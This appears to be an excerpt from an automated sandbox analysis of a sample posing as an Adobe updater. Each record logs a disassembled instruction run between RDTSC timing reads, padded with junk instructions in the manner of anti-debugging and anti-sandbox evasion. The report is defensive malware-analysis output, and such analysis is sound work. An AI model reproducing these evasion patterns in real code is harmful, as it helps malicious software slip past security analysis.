Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E9013E second address: 4E90142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E90142 second address: 4E90148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E90148 second address: 4E901C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 call 00007F09D0731CB1h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F09D0731CB7h 0x00000015 mov ebx, dword ptr [ebp+10h] 0x00000018 pushad 0x00000019 pushad 0x0000001a movzx esi, bx 0x0000001d popad 0x0000001e mov ecx, ebx 0x00000020 popad 0x00000021 push esi 0x00000022 jmp 00007F09D0731CB2h 0x00000027 mov dword ptr [esp], esi 0x0000002a jmp 00007F09D0731CB0h 0x0000002f mov esi, dword ptr [ebp+08h] 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F09D0731CB7h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E901C9 second address: 4E901FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007F09D0D9C3E0h 0x0000000c or eax, 26D53E88h 0x00000012 jmp 00007F09D0D9C3DBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, edi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E901FC second address: 4E90200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E90200 second address: 4E90206 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E90206 second address: 4E9026D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F09D0731CABh 0x0000000f xchg eax, edi 0x00000010 jmp 00007F09D0731CB6h 0x00000015 test esi, esi 0x00000017 jmp 00007F09D0731CB0h 0x0000001c je 00007F0A427D0072h 0x00000022 jmp 00007F09D0731CB0h 0x00000027 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002e pushad 0x0000002f movzx eax, di 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E9026D second address: 4E902DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 je 00007F0A42E3A78Eh 0x0000000c jmp 00007F09D0D9C3DBh 0x00000011 mov edx, dword ptr [esi+44h] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F09D0D9C3E4h 0x0000001b add ecx, 57B06338h 0x00000021 jmp 00007F09D0D9C3DBh 0x00000026 popfd 0x00000027 push eax 0x00000028 push edx 0x00000029 pushfd 0x0000002a jmp 00007F09D0D9C3E6h 0x0000002f jmp 00007F09D0D9C3E5h 0x00000034 popfd 0x00000035 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E902DE second address: 4E90311 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 or edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edi, ecx 0x00000010 pushfd 0x00000011 jmp 00007F09D0731CB0h 0x00000016 or cx, 5F28h 0x0000001b jmp 00007F09D0731CABh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E90311 second address: 4E90317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E90317 second address: 4E9031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E9031B second address: 4E90370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edx, 61000000h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F09D0D9C3E4h 0x00000018 and ah, FFFFFFB8h 0x0000001b jmp 00007F09D0D9C3DBh 0x00000020 popfd 0x00000021 mov ch, DCh 0x00000023 popad 0x00000024 jne 00007F0A42E3A704h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F09D0D9C3DEh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4E90370 second address: 4E90375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA001D second address: 4EA0023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA0023 second address: 4EA0028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA0028 second address: 4EA008A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F09D0D9C3E4h 0x0000000f or ecx, 74C37A58h 0x00000015 jmp 00007F09D0D9C3DBh 0x0000001a popfd 0x0000001b mov cx, 230Fh 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F09D0D9C3E0h 0x00000028 jmp 00007F09D0D9C3E5h 0x0000002d popfd 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA008A second address: 4EA00C5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007F09D0731CB6h 0x0000000e and esp, FFFFFFF8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F09D0731CB7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA00C5 second address: 4EA0102 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F09D0D9C3DEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F09D0D9C3DEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA0102 second address: 4EA0114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA0114 second address: 4EA0149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F09D0D9C3E7h 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F09D0D9C3E0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA0149 second address: 4EA014F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA014F second address: 4EA0160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0D9C3DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA0160 second address: 4EA0183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F09D0731CB6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA0183 second address: 4EA0192 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA0192 second address: 4EA01F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e pushfd 0x0000000f jmp 00007F09D0731CB9h 0x00000014 adc ecx, 16E55D06h 0x0000001a jmp 00007F09D0731CB1h 0x0000001f popfd 0x00000020 popad 0x00000021 mov esi, dword ptr [ebp+08h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA01F0 second address: 4EA0203 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA0203 second address: 4EA0248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, FA31h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a sub ebx, ebx 0x0000000c pushad 0x0000000d jmp 00007F09D0731CB3h 0x00000012 mov ax, C47Fh 0x00000016 popad 0x00000017 test esi, esi 0x00000019 jmp 00007F09D0731CB2h 0x0000001e je 00007F0A427B7DF8h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA0248 second address: 4EA024C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA024C second address: 4EA0252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA0252 second address: 4EA0258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA0258 second address: 4EA025C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA025C second address: 4EA0285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 call 00007F09D0D9C3E6h 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA0285 second address: 4EA02EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F09D0731CB1h 0x0000000c sub ax, 9BE6h 0x00000011 jmp 00007F09D0731CB1h 0x00000016 popfd 0x00000017 popad 0x00000018 mov ecx, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov si, bx 0x00000020 pushfd 0x00000021 jmp 00007F09D0731CAFh 0x00000026 sub ah, 0000001Eh 0x00000029 jmp 00007F09D0731CB9h 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA02EB second address: 4EA0340 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0A42E22479h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F09D0D9C3E3h 0x00000018 and al, FFFFFFDEh 0x0000001b jmp 00007F09D0D9C3E9h 0x00000020 popfd 0x00000021 mov esi, 6E44BCA7h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA0340 second address: 4EA0374 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [76FB6968h], 00000002h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F09D0731CB8h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA0374 second address: 4EA0383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA0383 second address: 4EA042C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov dh, E4h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F0A427B7CCEh 0x00000011 pushad 0x00000012 mov eax, 75B27D5Fh 0x00000017 mov edx, eax 0x00000019 popad 0x0000001a mov edx, dword ptr [ebp+0Ch] 0x0000001d jmp 00007F09D0731CAEh 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 mov edi, ecx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F09D0731CB8h 0x0000002d and al, 00000028h 0x00000030 jmp 00007F09D0731CABh 0x00000035 popfd 0x00000036 mov dh, ah 0x00000038 popad 0x00000039 popad 0x0000003a push eax 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007F09D0731CB0h 0x00000042 jmp 00007F09D0731CB5h 0x00000047 popfd 0x00000048 mov dx, ax 0x0000004b popad 0x0000004c xchg eax, ebx 0x0000004d pushad 0x0000004e mov edi, esi 0x00000050 jmp 00007F09D0731CB4h 0x00000055 popad 0x00000056 xchg eax, ebx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA042C second address: 4EA0449 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA04BE second address: 4EA04D2 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 5C306ABAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop edi 0x00000010 movzx esi, di 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA04D2 second address: 4EA04D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA04D8 second address: 4EA04F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esp, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA04F0 second address: 4EA04F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA04F4 second address: 4EA0511 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EA0511 second address: 4EA0536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0D9C3DDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F01A23 second address: 4F01A67 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dl, A3h 0x00000008 popad 0x00000009 push 00000001h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F09D0731CB9h 0x00000014 and si, EFC6h 0x00000019 jmp 00007F09D0731CB1h 0x0000001e popfd 0x0000001f mov cx, 7477h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F01A67 second address: 4F01A80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F01A80 second address: 4F01A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, cx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F01AB2 second address: 4F01A23 instructions: 0x00000000 rdtsc 0x00000002 mov dx, 193Ch 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007F09D0D9C3E5h 0x0000000e adc si, 3A96h 0x00000013 jmp 00007F09D0D9C3E1h 0x00000018 popfd 0x00000019 popad 0x0000001a retn 0004h 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 push eax 0x00000021 call ebx 0x00000023 mov edi, edi 0x00000025 jmp 00007F09D0D9C3E0h 0x0000002a xchg eax, ebp 0x0000002b jmp 00007F09D0D9C3E0h 0x00000030 push eax 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F09D0D9C3E1h 0x00000038 jmp 00007F09D0D9C3DBh 0x0000003d popfd 0x0000003e mov di, ax 0x00000041 popad 0x00000042 xchg eax, ebp 0x00000043 jmp 00007F09D0D9C3E2h 0x00000048 mov ebp, esp 0x0000004a jmp 00007F09D0D9C3E0h 0x0000004f push 0000007Fh 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 movzx eax, di 0x00000057 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9057DD second address: 9057E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9059F2 second address: 9059F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9059F6 second address: 905A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jl 00007F09D0731CA8h 0x0000000f pushad 0x00000010 jo 00007F09D0731CA6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC0A3C second address: 4EC0A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4EC0A42 second address: 4EC0A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10DBD second address: 4F10DDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 5FDD4F89h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10DDE second address: 4F10DE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED05DB second address: 4ED05E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED05E1 second address: 4ED05E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED05E5 second address: 4ED060D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F09D0D9C3E4h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED060D second address: 4ED0613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED0613 second address: 4ED064F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push edx 0x0000000e movzx esi, bx 0x00000011 pop edx 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 movzx eax, dx 0x00000019 call 00007F09D0D9C3E9h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED064F second address: 4ED069B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 and esp, FFFFFFF0h 0x00000009 pushad 0x0000000a mov esi, edx 0x0000000c pushfd 0x0000000d jmp 00007F09D0731CAFh 0x00000012 sbb ah, 0000006Eh 0x00000015 jmp 00007F09D0731CB9h 0x0000001a popfd 0x0000001b popad 0x0000001c sub esp, 44h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F09D0731CADh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED069B second address: 4ED06A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED06A1 second address: 4ED06BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F09D0731CB1h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED06BF second address: 4ED0721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F09D0D9C3DAh 0x00000009 jmp 00007F09D0D9C3E5h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F09D0D9C3E0h 0x00000015 xor al, FFFFFFD8h 0x00000018 jmp 00007F09D0D9C3DBh 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 mov dword ptr [esp], ebx 0x00000024 pushad 0x00000025 mov dh, al 0x00000027 mov ch, dl 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F09D0D9C3DFh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED0721 second address: 4ED0749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 jmp 00007F09D0731CABh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov ebx, 3428F70Ah 0x00000015 mov ebx, 35E779D6h 0x0000001a popad 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED0749 second address: 4ED074D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED074D second address: 4ED0753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED0753 second address: 4ED0759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4ED0759 second address: 4ED075D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
